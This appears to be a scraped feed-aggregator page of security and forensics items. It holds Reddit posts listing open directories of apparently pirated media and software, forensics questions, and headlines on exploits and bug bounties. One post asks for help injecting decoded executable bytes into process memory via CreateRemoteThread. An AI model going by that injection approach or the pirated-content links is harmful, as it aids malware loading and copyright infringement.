    https://cosconor.fr/ - Radio/GSM Docs, Drivers, Wallpapers (anyone need a wallpaper for their blackberry?), etc. http://36.92.42.3:8282/ - eBooks, Android apps, Software, Drivers (Custom OD for some Tech company) http://genesfinefoods.net/recipes/ - Recipes http://www.thepollacks.com/recipes/ - Recipes http://www.deanricci.com/recipes/ - Recipes https://health.mbolli.ch/ - Health videos/documents/propaganda http://www.nude-muse.com/Free/ - NSFW videos/pictures http://bozek.cz/shanachan.org/ - NSFW (NSFL?) http://costartech.com/pb/Vehicle%20Info/ - Manuals For Replacing the CIM in various makes/models of vehicles https://joelixny.soupwhale.com/lalila/ - The Office (US) S09 http://www.ashleecadell.com/x-andi-xyz/ - Music & TV Shows http://54.36.106.156/ - Movies & TV Shows http://54.37.190.125/ - Movies, TV Shows, Anime, PC Games, Tech eBooks (FR/EN) https://icepug.xyz/ - Movies, TV Shows, Software http://www.wolonger.com/ - NSFW Movies, TV Shows, Software, OS ISOs https://federicogorla.site/downloads/ - TV Shows http://208.58.215.222/ - Small collection of Movies & a TV Show http://144.76.201.109/ - TV Show (FR), OpenVPN w/ a profile, etc. http://136.243.36.36/cartoons/ - Small collection of cartoons http://open.crowbar.lt/ - TV Shows, Black Mesa, Audio/Video from Babcon 1995 http://193.32.23.167/ - PLA Media Pack, Prank Phone Calls submitted by /u/JasonSec [link] [comments]
    Movies, music, anime, concerts, eBooks, and more
    http://113.14.80.134:9002/ => Mostly anime (chinese subs), BGM https://128.93.166.14/ => Press articles, conferences/talks, radio podcasts, interviews and various other things (various languages) http://193.55.211.36:8081/ => Looks like radio rips, mostly music but there's also podcasts (French) http://193.49.213.142/ => Pharo programming language tutorials (pdf and videos) in multiple languages (mostly english and french) http://89.91.159.6:8080/ => Movies, series, anime (French) http://93.115.96.215/ => Series and movies (French) http://92.131.197.89:8000/ => Music, movies, anime, series http://90.127.218.242:8000 => Movies, seems low quality (French subs) http://90.120.236.174:81/ => Loads of movies, series, cartoons, and other videos http://90.102.25.202/ => Loads of house plans http://90.55.90.149/ => Music sheets, various music http://90.46.114.89/Musiques/ => Loads of triaged musics http://90.23.56.118/Video/ => Concerts, movies, cartoons (mostly French apart from the concerts) http://86.247.124.74/FTP_Upload/TEM/ => French movies and series http://82.121.68.193/ => Movies, TV Shows, mostly multi dub but some french-only http://81.250.211.110/ => Looks like radio rips submitted by /u/MasterIO02 [link] [comments]
  • Open

    SHELLCODE with python HELP!
    Hello learned people, Intent: I am writing a practice project where the intent is to take a base64 encoded text, decode that, and execute within current process memory. Please note the Base64 text is the direct encoding of an exe file. Problem: after decoding it's giving my result in Bytes which is perfect. When pushing that as shellcode to OpenProcess, WriteProcessMemory, CreateRemoteThread, error code wise everything works fine but nothing happens. But for the same file, a donut converted shellcode is working as intended. Testing: For testing purposes, I printed out the bytes returned by both my function and Donut-Shellcode's and compared it online. Says there's no difference. I tested with Type(), Len() and everything is same. So Question: Why is my version of bytes not working and Donut's is if there's no visible difference? And what can I do about it? Thanks. https://preview.redd.it/pl7vmcwwqlu91.png?width=984&format=png&auto=webp&s=1f31282e89ade0a273fd898ec8541d42c45d283b submitted by /u/C0DEV3IL [link] [comments]
  • Open

    FTK Imager Access denied
    Hey all, I am a SysAdmin NASA contractor who dabbles in security and forensics, mostly with SIFT, but 3 weeks ago I started a PI firm, and was given a tip to check out FTK. Filling out the form to download the Imager and Captcha leads me to an Access Denied on FF, Chrome, Brave etc. ​ AccessDeniedAccess DeniedCXP9ZN6X6H667CA0UEHZG4CP+qTHWnRBl1jvaymHkysPEYaSTI+L2JVHHSucJshBUMu58ChzaXSWCefiftT6l8872Dc= Also, does anyone have any info on what a single FTK license costs? ​ Appreciate it guys. submitted by /u/Responsible_Invite73 [link] [comments]
    Career Path
    So, essentially I need a bit of guidance on what type of career path fits what I am interested in. I have always been really good at sleuthing around on the internet (albeit using the most basic tools available..). Example: my best friend gave me the name of a guy who asked her on a date and within minutes I had found he had a wife, a baby, an attempted murder charge, among many others. Just a small example. Anyways, I have always genuinely enjoyed investigative type stuff, and recently after many years of being pretty aimless on an actual career I came to the realisation I’d like to pursue something where I could use those basic skills and learn more and develop an actual career. Any guidance would be super appreciated! submitted by /u/Altruistic-Blueberry [link] [comments]
    DF Police Jobs (UK)
    Hey guys, Does anyone have any idea how long can application screening take when applying for DF jobs within a police department (UK)? I assume it varies but are we talking days or potentially weeks? I’m a graduate applying for a junior role. submitted by /u/True-Housing-7515 [link] [comments]
    SANS GCFE
    Has anyone taken the GCFE exam recently ? I’m taking it in November, wanted to check if the exam has labs or is it just MCQs ? submitted by /u/x_r2 [link] [comments]
  • Open

    SecWiki News 2022-10-18 Review
    企业安全建设的起步 by ourren 车联网安全基础知识之USB SPH2.0线束制作 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-10-18 Review
    企业安全建设的起步 by ourren 车联网安全基础知识之USB SPH2.0线束制作 by ourren 更多最新文章,请访问SecWiki
  • Open

    The Embassy Collection: la historia detrás de nuestro nuevo NFT
    ¿Qué es lo primero que piensas cuando miras un sombrero? ¿Es el color? ¿El estilo? ¿El confort? Tal vez lo bien que te hace sentir cuando… Continue reading on Medium »
    What is JWT (JSON Web Token) ? Authorization Tokens (Part 2)
    The story starts with a problem. The problem that occurs with Session Tokens. We discussed in Part 1. Give that a 4 minute read before… Continue reading on System Weakness »
    WordPress Subdomain Takeover on Bugcrowd Private Program
    Hello guys👋👋, Prajit here from the BUG XS Team, recently I got a valid WordPress Subdomain Takeover on a Bugcrowd private program, in… Continue reading on Medium »
    What is Session ID / Session Token ? Authorization Tokens (Part 1) (WebApp Pentesting)
    SYNOPSIS : HTTP & it’s behaviour Continue reading on System Weakness »
    Pushing Burpsuite cert to system store in Android(rooted)
    Having your burpsuite ca certificate pushed to system store provides you greater advantage in your testing. certificates in system store… Continue reading on Medium »
    Exploitation of misconfigured Amazon aws s3 buckets
    Yo! Continue reading on Medium »
    Bug Bounty: Google Maps API key leaked on reconnaissance.
    Hi folks, this article is about how I discovered a leaked google map API key on public facing web application during a bug bounty program. Continue reading on Medium »
    Burp Suite? No Thanks! Blind SQLi in DVWA With Python (Part 1)
    I’ll try to show you how to build an exploit from scratch and its advantages. Continue reading on InfoSec Write-ups »
    Everything about Session Puzzling and Hijacking
    A decade or two from now, no one would have anticipated that web apps might become such engaging, fancy user roles or dynamic material to… Continue reading on CodeX »
  • Open

    角逐年度安全品牌影响力 |「WitAwards中国网安行业2022年度评选」火热进行中
    快来看看你支持的企业上榜了吗?你一票我一票,心仪品牌就“出道”。
    FreeBuf早报 | Hashcat可在60分钟内破解八位密码;Lazarus疯狂盗取加密货币
    暴力密码破解工具 Hashcat的核心开发者表示, 八块RTX 4090显卡阵列可在60分钟内破解八位密码。
    面临风险的“王国之钥”:加速暴露的单点登录(SSO)凭据
    单点登录(SSO)凭据被网络安全专业人士认为是“王国之钥”。员工使用这些凭据登录一次就可以访问许多应用程序。
    微信社工攻击防护方案
    微信社工攻击防护方案,拒绝高科技和狠活。
    澳大利亚零售巨头泄露220万用户数据,并被黑客在线出售
    澳大利亚零售巨头Woolworths 批露了近期旗下子公司MyDeal一起影响 220 万用户的数据泄露事件。
    俄罗斯对保加利亚发起网络攻击
    保加利亚政府机构的基础设施遭到大规模 DDoS 攻击,包括内务部、国防部、司法部、宪法法院等多个政府部门受到严重影响。
    「WitAwards中国网安行业2022年度评选」投票开启,PICK你心中NO.1
    欢迎各位积极投票,心仪企业就“出道”。
  • Open

    Dameware Mini: The Sleeper Hit of 2019?
    SolarWinds! You hear the name and immediately think “solutions management” or big screens full of more network information than you can shake a stick at. SolarWinds has been on the scene since 1999, and their products and solutions can be found in networks worldwide. SolarWinds Dameware Mini Remote Control is one such offering. On the... The post Dameware Mini: The Sleeper Hit of 2019? appeared first on TrustedSec.
  • Open

    Hacking into a modern Linux distribution
    3 methods to gain access to the Linux filesystem Continue reading on InfoSec Write-ups »
    Burp Suite? No Thanks! Blind SQLi in DVWA With Python (Part 1)
    I’ll try to show you how to build an exploit from scratch and its advantages. Continue reading on InfoSec Write-ups »
    XML External Entities
    No content preview
  • Open

    Hacking into a modern Linux distribution
    3 methods to gain access to the Linux filesystem Continue reading on InfoSec Write-ups »
    Burp Suite? No Thanks! Blind SQLi in DVWA With Python (Part 1)
    I’ll try to show you how to build an exploit from scratch and its advantages. Continue reading on InfoSec Write-ups »
    XML External Entities
    No content preview
  • Open

    Hacking into a modern Linux distribution
    3 methods to gain access to the Linux filesystem Continue reading on InfoSec Write-ups »
    Burp Suite? No Thanks! Blind SQLi in DVWA With Python (Part 1)
    I’ll try to show you how to build an exploit from scratch and its advantages. Continue reading on InfoSec Write-ups »
    XML External Entities
    No content preview
  • Open

    “October Mentoring Fest”
    ISO 27001 DAN 27002 Continue reading on Medium »
    Open Source Intelligence Market Analysis, Growth Impact and Demand By Regions Till 2030
    Market Overview Continue reading on Medium »
    Hepimiz Casus muyuz?
    Açık kaynak istihbaratı (Open-source intelligence) , kısaca Osint, bilgi üreten kamuya açık, ücretsiz ve açık kaynaklı araçlardan bir veri… Continue reading on Sanction Scanner Türkiye »
    Visualisasi dan Analisis Data untuk Investigasi Kejahatan Siber
    Badan Siber dan Sandi Negara (BSSN) menyebut lebih dari 700 juta serangan siber terjadi di Indonesia pada 2022. Serangan siber yang… Continue reading on Medium »
  • Open

    CVE-2021-34866 Linux 内核提权漏洞分析
    作者:b1cc@墨云科技VLab Team 原文链接:https://mp.weixin.qq.com/s/w0HYPpdMxhcPvKvtSJf_CQ 2021年10月12日,日本安全厂商 Flatt security 披露了 Linux 内核提权漏洞CVE-2021-34866。11月5日,@HexRabbit 在 Github 上公布了此漏洞的利用方式,并写文分析,技术高超,行文简洁。...
  • Open

    CVE-2021-34866 Linux 内核提权漏洞分析
    作者:b1cc@墨云科技VLab Team 原文链接:https://mp.weixin.qq.com/s/w0HYPpdMxhcPvKvtSJf_CQ 2021年10月12日,日本安全厂商 Flatt security 披露了 Linux 内核提权漏洞CVE-2021-34866。11月5日,@HexRabbit 在 Github 上公布了此漏洞的利用方式,并写文分析,技术高超,行文简洁。...
  • Open

    Persistence on a windows machine using “winrm” (no creds needed)
    Step 1: Continue reading on Medium »

  • Open

    extrnode: how we plan to fix the main vulnerability of the RPC layer in Web3
    Article URL: https://mirror.xyz/extrnode.eth/7bgVDpJP4_1FNWYBfX_OzFaOtK39oDuFOxQxmxdCaQQ Comments URL: https://news.ycombinator.com/item?id=33241223 Points: 2 # Comments: 1
    Java Apache Commons Text vulnerability
    Article URL: https://nvd.nist.gov/vuln/detail/CVE-2022-42889 Comments URL: https://news.ycombinator.com/item?id=33230603 Points: 110 # Comments: 34
  • Open

    Website blacklisted. Is the website person or IT person to blame?
    Our website person says our IT person is to blame for a blacklist, and our IT person says our website person is to blame. Here’s what I know: We went two weeks with some outbound and some inbound emails not being delivered. Once I realized the issue, I was told the website had been blacklisted by Barracuda. Who do I need to address to remedy this and how come neither the IT person or website person were notified of this issue? When the blacklist first occurred. Relevant screenshots with domain redacted: https://ibb.co/nszTC38 https://ibb.co/f14yzCj I apologize if I sound ignorant. Thank you for any help! submitted by /u/Scout_It_Down [link] [comments]
    Are there any PDF specific YARA rules you know of that are not collected in The Pdfalyzer repo yet?
    If so, please post them here; trying to scrounge up everything I can. The Pdfalyzer (PyPi) Direct link to the folder with 3 .yara files compiling a bunch of YARA rule sources. Looking for anything not represented here, or even ideas for such. submitted by /u/thenextsymbol [link] [comments]
    From an IT security perspective, why is WFH seen as riskier than working in-office?
    From an IT security perspective, why is WFH seen as riskier than working in-office? Yes, I can ask my colleagues sitting beside me about a potentially dodgy email. But aside from that, with most apps and data now being in the Cloud anyway, so why is working from home seen as riskier? submitted by /u/baghdadcafe [link] [comments]
  • Open

    verify file integrity in autopsy
    hello everyone. i am trying to find file authenticity in a disk image using autopsy in kali in virtual machine. how can i check md5 values integrity? i've already found the md5 values but i can't understand how can i verify them. i'm studying cyber security and this is a part of my assignment, any help is appreciated. submitted by /u/arbituas [link] [comments]
    People that still uses Guidance Tableau TD2 and TD3
    Is it faster if the destination port was plugged into a USB 3.0 or m.2 SSD enclosure? Any tips or tricks to speed up the imaging process? submitted by /u/hw60068n [link] [comments]
    Admissibility of write-blocking devices
    I was once informed that the legal system in some countries deemed the use of a write-blocking device as inadmissible in court. In a field where the main goal is not only to investigate an offense but also to preserve the integrity of the data examiners are analyzing, this all seems a bit illogical. I'm pretty sure that write-blocking devices is a must these days whenever a computer forensic investigation is conducted. Is there any reason for judges to not trust the reliability of the device, or are they just too narrow-minded for their own good? submitted by /u/jjThomson69 [link] [comments]
    Volatility - powershell history
    Quick volatility question over here. Is it possible to recover previously typed power shell commands? All the documentation I read talks about recovering Cmd.exe. I’ve tried cmdscan and consoles plugins. Even tried memdump with the process specified, but I’m not sure how to start making sense of that output. Any insight would be appreciated. submitted by /u/HelpBeginning4777 [link] [comments]
  • Open

    OSINT TOOLS 2022 (Part 2)
    Browser extensions for OSINT Continue reading on Medium »
    Digital Forensics on Fitness Trackers
    There are many fitness trackers on the market today such as the Fit Bit that will monitor your health in various ways. These devices… Continue reading on Medium »
    Digital Forensics on Fitness Trackers
    There are many fitness trackers on the market today such as the Fit Bit that will monitor your health in various ways. These devices… Continue reading on Medium »
    osint metasearch engine list free
    Hi everyone! Continue reading on Medium »
    OSINT Terminal User Interface
    Open Source Intelligence Terminal User Interface. OSINT from your favorite services in a friendly terminal user interface, written in Rust Continue reading on Medium »
  • Open

    CVE-2007-4559 Patch
    Article URL: https://github.com/search?type=Issues&s=created&o=desc&q=is%3Apr+author%3ATrellixVulnTeam Comments URL: https://news.ycombinator.com/item?id=33237352 Points: 2 # Comments: 0
  • Open

    Linux Privilege Escalation: Linux kernel / distribution exploits you should now about.
    No content preview
    ‍$6000 from Microsoft, WAF Bypass, Manual Exploitation, Nuclei Guide, Admin Panel and much…
    No content preview
    Conducting a free AWS Security Assessment with Prowler
    Get a complete AWS security report with this free tool Continue reading on InfoSec Write-ups »
    SSH: Introduction, How to Secure and Working
    No content preview
    CVE-2022–41040: ProxyNotShell Exchange Vulnerability
    No content preview
    HTTP request smuggling Explained and Exploited Part 0x1
    No content preview
    How I Got $10,000 From GitHub For Bypassing Filtration oF HTML tags
    No content preview
  • Open

    Linux Privilege Escalation: Linux kernel / distribution exploits you should now about.
    No content preview
    ‍$6000 from Microsoft, WAF Bypass, Manual Exploitation, Nuclei Guide, Admin Panel and much…
    No content preview
    Conducting a free AWS Security Assessment with Prowler
    Get a complete AWS security report with this free tool Continue reading on InfoSec Write-ups »
    SSH: Introduction, How to Secure and Working
    No content preview
    CVE-2022–41040: ProxyNotShell Exchange Vulnerability
    No content preview
    HTTP request smuggling Explained and Exploited Part 0x1
    No content preview
    How I Got $10,000 From GitHub For Bypassing Filtration oF HTML tags
    No content preview
  • Open

    Linux Privilege Escalation: Linux kernel / distribution exploits you should now about.
    No content preview
    ‍$6000 from Microsoft, WAF Bypass, Manual Exploitation, Nuclei Guide, Admin Panel and much…
    No content preview
    Conducting a free AWS Security Assessment with Prowler
    Get a complete AWS security report with this free tool Continue reading on InfoSec Write-ups »
    SSH: Introduction, How to Secure and Working
    No content preview
    CVE-2022–41040: ProxyNotShell Exchange Vulnerability
    No content preview
    HTTP request smuggling Explained and Exploited Part 0x1
    No content preview
    How I Got $10,000 From GitHub For Bypassing Filtration oF HTML tags
    No content preview
  • Open

    SecWiki News 2022-10-17 Review
    Response中所隐藏的杀机---揭秘响应中所存在的脆弱点 by 蓝色淡风 SecWiki周刊(第450期) by 路人甲 最新CS RCE(CVE-2022-39197)复现心得分享 by ourren [HTB] Nunchucks Writeup by 0x584a 动静态结合分析非标准MD5算法及还原 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-10-17 Review
    Response中所隐藏的杀机---揭秘响应中所存在的脆弱点 by 蓝色淡风 SecWiki周刊(第450期) by 路人甲 最新CS RCE(CVE-2022-39197)复现心得分享 by ourren [HTB] Nunchucks Writeup by 0x584a 动静态结合分析非标准MD5算法及还原 by ourren 更多最新文章,请访问SecWiki
  • Open

    Small link...
    Few films music ect... good tunes... Link... NSFW only because of the swimwear vid & not been through it all... submitted by /u/xanderTgreat [link] [comments]
    Tons of popular and spanish/mexican music
    http://167.114.174.132:9092/music/ submitted by /u/Shitemoji69 [link] [comments]
  • Open

    How I Hacked my Crush’s school !
    How I got access of my Crush’s School’s Website’s Admin panel Continue reading on Medium »
    Facebook SMS Captcha Was Vulnerable to CSRF Attack
    This post is about an bug that I found on Meta (aka Facebook) which allows to make any Endpoint as POST request in SMS Captcha flow which… Continue reading on Medium »
    A $500+ Open Redirect Bounty in Under 10 Minutes
    This post is a quick guide on how to utilize the Open Redirect bug on any sites you test, including a real-world step-by-step. Continue reading on Medium »
  • Open

    A journey of fuzzing Nvidia graphic driver leading to LPE exploitation
    submitted by /u/jeandrew [link] [comments]
    Toner Deaf – Printing your next persistence (Hexacon 2022)
    submitted by /u/digicat [link] [comments]
  • Open

    Detecting Emerging Network Threats From Newly Observed Domains
    We discuss how to discover potential threats among newly observed domains at the time they begin to carry attack traffic. The post Detecting Emerging Network Threats From Newly Observed Domains appeared first on Unit 42.
  • Open

    FreeBuf早报 | 韩国多个网络平台瘫痪总统道歉;部分iPhone 14存在“不支持SIM卡”问题
    韩国SK公司C&C板桥数据中心15日发生火灾,导致包括韩国“国民聊天工具”Kakao Talk在内的多个网络平台服务中断。
    字节招聘 | 高级安全工程师、技术专家岗等你来投!
    欢迎有隐私合规安全、数据安全、客户端/移动安全&QA经验的的同仁!
    加密货币平台Mango Markets遭攻击损失超1亿美元,黑客宣布返还6700万
    一位自称对此次攻击负责的黑客,称要归还部分被盗资金,约6700万美元,余下的金额则当作名义上的漏洞赏金。
    因盗取信息,下载“果照”,一学生被判 13 个月监禁
    美国地区法院法官 Silvia Carreño Coll 以网络跟踪罪判处 Iván Santell-Velázquez 13 个月监禁。
  • Open

    OSINT Terminal User Interface
    Open Source Intelligence Terminal User Interface. OSINT from your favorite services in a friendly terminal user interface, written in Rust Continue reading on Medium »
    Primer on Active Directory for OSCP/OSEP/CRTP/CRTE
    Hey Squad, Continue reading on Medium »
  • Open

    Otp bypass in verifying nin
    MTN Group disclosed a bug submitted by mr_sparrow: https://hackerone.com/reports/1314172
  • Open

    Android NFC 条件竞争漏洞分析(CVE-2021-0870)
    作者:墨云科技VLab Team 原文链接:https://mp.weixin.qq.com/s/ck5wwDi9hXmjtiPPfRgtXw 概述 NFC在人们的日常生活中扮演了重要角色,已经成为移动设备不可或缺的组件,NFC和蓝牙类似,都是利用无线射频技术来实现设备之间的通信。因此芯片固件和主机NFC子系统都是远程代码执行(RCE)攻击的目标。 CVE-2021-0870是一枚NFC中的...
    8220 Gang 云僵尸网络感染全球约 3 万台主机
    作者:Tom Hegel 译者:知道创宇404实验室翻译组 原文链接:https://www.sentinelone.com/blog/8220-gang-cloud-botnet-targets-misconfigured-cloud-workloads/ 2022 年 7 月,我们报道了 8220 Gang,这是我们观察到的众多低技能犯罪软件团伙之一,通过已知漏洞和远程访问暴力强迫感染媒...
  • Open

    Android NFC 条件竞争漏洞分析(CVE-2021-0870)
    作者:墨云科技VLab Team 原文链接:https://mp.weixin.qq.com/s/ck5wwDi9hXmjtiPPfRgtXw 概述 NFC在人们的日常生活中扮演了重要角色,已经成为移动设备不可或缺的组件,NFC和蓝牙类似,都是利用无线射频技术来实现设备之间的通信。因此芯片固件和主机NFC子系统都是远程代码执行(RCE)攻击的目标。 CVE-2021-0870是一枚NFC中的...
    8220 Gang 云僵尸网络感染全球约 3 万台主机
    作者:Tom Hegel 译者:知道创宇404实验室翻译组 原文链接:https://www.sentinelone.com/blog/8220-gang-cloud-botnet-targets-misconfigured-cloud-workloads/ 2022 年 7 月,我们报道了 8220 Gang,这是我们观察到的众多低技能犯罪软件团伙之一,通过已知漏洞和远程访问暴力强迫感染媒...

  • Open

    My selection of Youtube channels for Hacking and Bug Bounty
    Years ago, I learned lots of hacking techniques by practicing exercises in Pentester Lab that were well-described and practical.  This time Continue reading on Medium »
    My First Critical Bug In HackerOne Platform
    Hello Everyone Continue reading on Medium »
    How I Got $10,000 From GitHub For Bypassing Filtration oF HTML tags
    Hey everyone👋, I hope you’re having an A+ week🚀! In today’s blog, I am going to tell you that, “How I Got $10,000 From GitHuB”. Continue reading on InfoSec Write-ups »
    HTTP request smuggling Explained and Exploited Part 0x1
    Hi! My name is Hashar Mujahid and today we will sneak a peek into Request Smuggling Vulnerabilities. Continue reading on InfoSec Write-ups »
    My fav 7 methods for Bypassing Android Root detection
    Hola H3ck3rs, Continue reading on Medium »
    Sql Injection for Beginners using Sqlmap Part -2
    Hello friends, I’m Rajneesh Kumar Arya back again with my new blog on SQL Injection. Continue reading on Medium »
    How Install RustScan in Kalilinux
    Fastest Port scanner Continue reading on Medium »
    Linux Privilege Escalation Part 1
    After we gain an initial foothold on the machine, the next step is to escalate the privilege of that machine. So in this writeup, we will… Continue reading on Medium »
  • Open

    Introduction to OSINT — tools, and techniques
    Those who read my Medium blog already know about my passion for OSINT and Financial Crimes.  So in today's post, I will give you a brief… Continue reading on Medium »
    SPY NEWS: 2022 — Week 41
    Summary of the espionage-related news stories for the Week 41 (October 9–15) of 2022. Continue reading on Medium »
  • Open

    Movies, Series, Anime in Spanish/Portuguese (ES,PT)
    http://190.108.85.179/ http://51.81.208.167/ http://89.41.180.242/ http://51.68.152.161/ http://104.225.235.61:8080/ http://80.29.87.59:8888/ http://144.217.180.205/ http://45.179.164.59:8181/ http://207.180.214.233/ https://170.254.244.15:9999/ http://142.4.219.127/ http://ns5000797.ip-142-4-219.net/ http://216.244.76.122/ submitted by /u/SubliminalPoet [link] [comments]
    Various Music (Rock, Techno, Jazz, World, Relaxation, ...)
    https://178.168.80.19/music/ http://83.212.115.216/ (electro/techno) https://90.164.127.216/Music/ (rock) https://212.159.121.149:2083/ (radio records) https://74.91.116.249/music/ https://46.252.16.77/music/ http://84.16.67.29:8080/ http://90.179.79.175/music/ http://193.77.232.76:8080/Music/Digital/ https://82.3.101.179/Music/ https://144.217.14.38/music/ http://73.253.211.145:8800/Music/ http://147.189.170.225/music/ http://10g02.netbroadcasting.tv/ http://home.darkok.xyz/Music/ https://music.drlazor.be/ http://bvovlive.edge.netbroadcasting.tv/ http://dl.smusic.ir/ submitted by /u/SubliminalPoet [link] [comments]
    A large collection of stencil art images
    submitted by /u/SubliminalPoet [link] [comments]
    ton of e-books https://avalonlibrary.net/ebooks/
    submitted by /u/Zizou70 [link] [comments]
  • Open

    Is my path correct for entry level SOC analyst role?
    Hi, my main goal at this point is to find a remote entry level SOC analyst role or similar. The important thing for me would be, it must be related to infosec and remote Things I've been doing: - Grinding tryhackme (my profile) and completing rooms, learning paths - Reverse engineering an android app with a private API and writing a public Kotlin library for it - Reading a lot about recent CVE's, write-ups, mitigation techniques Things I know: pretty much anything related to 'the job' (SIEMs, owasp zap, burpsuite, Linux, wireshark, active directory, reverse engineering binaries, apks etc., git, web vulnerabilities... etc.) Also, I know (by knowing I mean I developed some things with it and posted on GitHub): javascript, python, bash and kotlin. my github profile Daily driving Linux for more than 5 years (arch) I'm currently on the 3rd year of both Computer science degree and Management Information Systems degree And I feel like I couldn't get the job even if I applied to it. So my plan is to keep grinding TryHackMe until I'm around 1k ranking or below (currently 3.5k as you can see from my THM profile) and currently after I solve CTFs I submit a write-up to my medium profile In my mind, these should ease the process, hence why I'm doing it. My questions to anyone who read so far are: - is my current path correct (grind thm before applying job until I'm 1k or below, submit write-ups to medium after completing ctfs) - What are your general advices? Thanks submitted by /u/otuva [link] [comments]
  • Open

    Regulator: A unique method of subdomain enumeration
    submitted by /u/Quick-Ingenuity-7024 [link] [comments]
  • Open

    Virtual memory retrieval?
    If a computer is using virtual memory and power is lost, is the information that had been in the virtual memory retrievable since it could be using magnetic disk even though the information in RAM is lost? submitted by /u/FatumIustumStultorum [link] [comments]
  • Open

    Megaman zero
    Continue reading on Medium »
  • Open

    SecWiki News 2022-10-16 Review
    计算机教育中缺失的一课 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-10-16 Review
    计算机教育中缺失的一课 by ourren 更多最新文章,请访问SecWiki
  • Open

    企业安全建设之应用安全
    企业安全建设全体系分享。
    Sangfor华东战队:企业安全浏览器攻击与防御
    如今,网络非法犯罪总是在发明新的方法来欺骗用户,以获取他们的凭据、密钥和其他一切有价值的信息。
    AD-Resolute详解
    Hack The Box的Active Directory 101 系列域渗透的靶机Resolute。
    API上出现了恶意机器人!如何击败API机器人攻击?
    如何保护API免受机器人侵扰和攻击呢?下文将为大家介绍API 机器人检测和防护的有效方法。
    VnlnHub Ripper
    涉及知识:主机扫描、端口服务探测、敏感目录收集、WEB信息搜集、文件泄露、linux本地提权等。
    多因素身份验证(MFA)疲劳攻击呈上升趋势:如何防御它们
    长期以来,凭据泄露一直是网络入侵的主要原因之一。
    Wine是如何实现Windows跨平台兼容层工作的?
    如果你发现我完全是在误导别人,请伸出援手纠正我!
  • Open

    Evil Twin with Karma Attack in Enterprise WiFi Network
    submitted by /u/tbhaxor [link] [comments]

  • Open

    Simple account takeover
    I wanted to share a simple account takeover technique and the common pattern I found when it was available. Now there aren’t that many… Continue reading on Medium »
    CVE-2020–13956
    Motivation Continue reading on Medium »
    Practical Guide to Malware Analysis and Reverse Engineering(Analyzing VBA“Macros” Code P-2.2)
    Manually Analyzing VBA”Macros” Code P-2.2 Continue reading on Medium »
    How to get more accurate results with Google
    Google is almost used by everyone in today’s digital world for one or another thing. Be it to learn or just surf the internet google plays… Continue reading on Medium »
  • Open

    Cloudgoat AWS CTF solution- Scenerio 4 (cloud_breach_s3)
    Scenario: cloud_breach_s3 Continue reading on Medium »
    Red Team C2 Log Visualization
    RedEye is a visual analytic tool supporting Red & Blue Team operations Continue reading on Medium »
  • Open

    Docs from "AUTONOMOUS NON-PROFIT EDUCATIONAL ORGANIZATION HIGHER EDUCATION "CRIMEAN INSTITUTE OF BUSINESS" in Russian
    https://drive.google.com/drive/folders/1Vi8kR4AwGb5Vk8IZntZ9Z1S5pgRMKnDh submitted by /u/dudewithoneleg [link] [comments]
    [NSFW] ROMs, eBooks, Software, Games
    https://aidymatic.co.uk/apps/ - Emulators for Android, ROMs (N64, PCE, SNES, GENESIS), and gameplay videos http://privat.bahnhof.se/wb220832/ - Various game mods http://45.32.33.124/ - Programming ebooks http://178.213.152.72/ - eBooks (Various languages) https://crashrecovery.org/woolfolk/ - eBooks (Religious, propaganda, etc) http://45.76.45.44/ - eBooks, Software, Videos of science experiments (1.mp4 that face lmao) https://infopirate.xyz/ - Tech eBooks https://dev.host/~shmup/ - eBooks, random TV Shows, ROMs, Feet Videos (NSFW?) https://www.kidssearch.com/ColoringPages/ - Pages for coloring (shocking I know) http://164.115.43.80/eBooks/ - eBooks & Courses http://www4.hcmut.edu.vn/~honhuynh/ - Windows Software http://103.203.93.5/ - Windows Software, PC Games, OS ISOs http://www.miyako.pro/files/ - Windows Software, Games, Music, Manga (NSFW) submitted by /u/JasonSec [link] [comments]
  • Open

    Rfparty - a new way to see BLE
    submitted by /u/sevenbitbyte [link] [comments]
    Volatility 3 vs 2 for Linux memory forensics
    Hi Experts, So far I have been using Volatility 2 for Linux forensics, but was wondering has anyone here tried both the 3 and 2 for Linux forensics? Is there any benefit for me to switch to Volatility 3 primary for Linux forensics? Tried reading the docs here: https://readthedocs.org/projects/volatility3/downloads/pdf/latest/ But got confused with all the symbol table stuff, so is there any real benefit for me to switch to 3? Do Linux forensic experts still use 2 or are switching to 3? My my problem with volatility 2 is the requirement for me to build a different profile for every god damn custom kernel out there which becomes a headache, not to mention that the target machine not having the required packages for me to do a make. So are these improved in Volatility 3? submitted by /u/Ro0o0otkit [link] [comments]
    Forensic Images for Class Work?
    Hi Folks, I am sure we have some instructors in this Reddit.. How do you recommend making Problem "Images" for students to work on? Specifically keeping the Size down, appearing as a Windows PC, and including files in unallocated space. I was thinking a Logical image just pulling in what I needed but In FTK Imager that creates the AD1 format which might not work for me in other tools. Any ideas? Thanks.. submitted by /u/Peardog_PA [link] [comments]
    Majoring Question
    Hi everyone- I'm currently completing my A.A degree and plan on a career in computer/digital forensics and analysis. What are your opinions on pursuing a major in Forensics (B.S) with a minor in computer science? That's what I'm planning on doing and after that, I plan on pursuing a master's in Cybercrime if needed. Ofc I'll be completing certifications and learning relevant skills on the side. submitted by /u/Purple_Nesquik [link] [comments]
  • Open

    Steganography #1: Creating a digital microdot
    I recently came across a Tweet from Hexadecim8 explaining how to make microdots using photographic film. This stenography technique was… Continue reading on Medium »
    Payatu Hiring CTF 2022
    Network 1,2 Writeu Continue reading on Medium »
    OSINT
    OSINT (Open Source Intelligence) Continue reading on Medium »
  • Open

    Which chapters of Network Security Assessment and RTFM are recommended for the CPSA?
    I am taking the CREST CPSA Exam in the near future and want to revise for it as effectively as possible. I've read a bunch of posts and blogs about it and done some revision on port numbers and HTTP codes but I would like to read these 2 as many people seem to suggest that they will be the most helpful. I've had a look at them and there is about 700 pages between the two of them which would take months for me to read if I'm being honest. So I was wondering if anyone has any tips here or can outline chapters that will be the most useful to me so I can target my efforts submitted by /u/kylomorales [link] [comments]
    tcp packet out of state
    Hi. We've observed traffic being dropped on the firewall due to tcp packet out of state. Do you guys happen to know what this means? Below is what can be seen in the firewall log. Thanks in advance. Tcp packet out of state : First packet isn't SYN TCP Flags : ACK submitted by /u/lostandconfuseddt [link] [comments]
  • Open

    SecWiki News 2022-10-15 Review
    推荐系统排序环节的特征Embedding建模 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-10-15 Review
